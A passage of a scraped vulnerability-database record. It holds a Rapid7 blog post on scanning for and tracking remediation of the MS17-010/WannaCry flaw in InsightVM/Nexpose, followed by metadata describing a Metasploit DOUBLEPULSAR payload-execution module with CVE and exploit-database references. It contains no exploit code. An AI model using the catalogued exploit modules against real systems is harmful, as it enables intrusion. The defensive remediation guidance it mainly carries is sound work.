jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds &lt;=&gt; ( altId = \"ms17-010\" )\"</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66977/pastedImage_2.png\"><img class=\"image-15 jive-image\" height=\"473\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66977/758-473/pastedImage_2.png\" style=\" width: 767.39px;\" width=\"758\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on WannaCry and ransomware, please visit this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">page</a>. </span></p></div><!-- [DocumentBodyEnd:1fb0e960-c2df-479c-860b-c11c12f4819b] -->", "cvelist": ["CVE-2017-0101", "CVE-2017-0102", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/16/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "modified": "2017-05-16T14:27:53", "lastseen": "2017-05-16T14:48:48"}, "differentElements": ["description", "published", "modified"], "edition": 1}], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- [DocumentBodyStart:bc62d177-a43a-4d62-b4f0-851708246874] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating we want to keep this simple. First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren&#8217;t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check &ldquo;<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>&#8221; and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 192 checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Now, under \"By Category\" click &ldquo;Remove Categories&#8221;, select all, and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66950/pastedImage_16.png\"><img class=\"image-6 jive-image\" height=\"202\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66950/758-202/pastedImage_16.png\" style=\" width: 973.212px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66952/pastedImage_18.png\"><img class=\"jive-image image-8\" height=\"161\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66952/758-161/pastedImage_18.png\" style=\" width: 1008.09px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">6. And finally, under Check Type, click &ldquo;Remove Check Types&#8221;, select all, and click save</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66953/pastedImage_20.png\"><img class=\"image-9 jive-image\" height=\"122\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66953/758-122/pastedImage_20.png\" style=\" width: 1060.2px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">7. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66979/pastedImage_1.png\"><img class=\"image-16 jive-image\" height=\"477\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66979/pastedImage_1.png\" style=\"max-width:664px; max-\" width=\"664\"/></a></p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">OR asset.vulnerability.title CONTAINS \"cve-2017-0102\"</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds &lt;=&gt; ( altId = \"ms17-010\" )\"</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66977/pastedImage_2.png\"><img class=\"image-15 jive-image\" height=\"473\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66977/758-473/pastedImage_2.png\" style=\" width: 767.39px;\" width=\"758\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on WannaCry and ransomware, please visit this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">page</a>. </span></p></div><!-- [DocumentBodyEnd:bc62d177-a43a-4d62-b4f0-851708246874] -->", "cvelist": ["CVE-2017-0101", "CVE-2017-0102", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/16/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "modified": "2017-05-16T17:51:28", "lastseen": "2017-05-16T18:48:52", "immutableFields": [], "cvss2": {}, "cvss3": {}}], "metasploit": [{"id": "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "hash": "012add761b4c443d021311bbf43b7c822db15fb34e75b0740cea5b3005e90975", "type": "metasploit", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR Payload Execution and Neutralization", "description": "This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.\n", "published": "2019-09-30T19:18:41", "modified": "2020-02-03T17:16:16", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://github.com/countercept/doublepulsar-detection-script", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "lastseen": "2020-09-30T18:12:04", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-09-30T18:12:04", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-09-30T18:12:04", "rev": 2, "value": 6.8, "vector": "NONE"}}, "hash": "27fb556c26bbde8903e3bb8617729bdd9e9d34f7c5a6bdb43cdf1cbe49a8a9af", "hashmap": [{"hash": "ead92bdcd20cbc918e777e28c4a83623", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "c25dabffe89097874a062017ca347cc8", "key": "modified"}, {"hash": "03b7f7b734bdffbd849759d24edab76d", "key": "published"}, {"hash": "79b03fa9178806f1694441cff96d84a3", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "href"}, {"hash": "2a4acb977d851155649ad6e4f1698975", "key": "references"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "74798933f90c8c8a3dcac277d7c31e76", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "type"}, {"hash": "142f691ada068c40ae71fdd0eac8502e", "key": "cvelist"}], "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "immutableFields": [], "lastseen": "2020-09-30T18:12:04", "modified": "2020-02-03T17:16:16", "objectVersion": "1.5", "published": "2019-09-30T19:18:41", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1", "https://github.com/countercept/doublepulsar-detection-script", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "title": "DOUBLEPULSAR Payload Execution and Neutralization", "type": "metasploit", "viewCount": 1717}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2020-09-30T18:12:04"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.\n", "enchantments": {"dependencies": {"modified": "2020-08-01T21:14:18", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", 